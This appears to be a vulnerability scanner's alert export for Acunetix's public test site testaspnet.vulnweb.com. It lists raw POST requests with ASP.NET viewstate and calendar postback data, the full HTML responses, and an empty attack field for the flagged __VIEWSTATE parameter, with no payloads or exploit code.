Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8623&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCA7uf9mdsIZGRkUOCC%2Fqr1gDKjGJs9HYPc4dwJ3QY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLax6S0BwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga2SI0pG6KV%2BCEaZJD03sunjonfjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:41 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCA7uf9mdsIZGRkUOCC/qr1gDKjGJs9HYPc4dwJ3QY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLax6S0BwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga2SI0pG6KV+CEaZJD03sunjonfjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:White" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8615&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCAoJS0k9sIZGRkbnscziys4lB7TEx%2F2vA6qM95%2FGM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLToM3fAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb7yW5cROJy8VJWdz5SvwFrShqkZA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:21 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCAoJS0k9sIZGRkbnscziys4lB7TEx/2vA6qM95/GM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLToM3fAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb7yW5cROJy8VJWdz5SvwFrShqkZA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:White" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
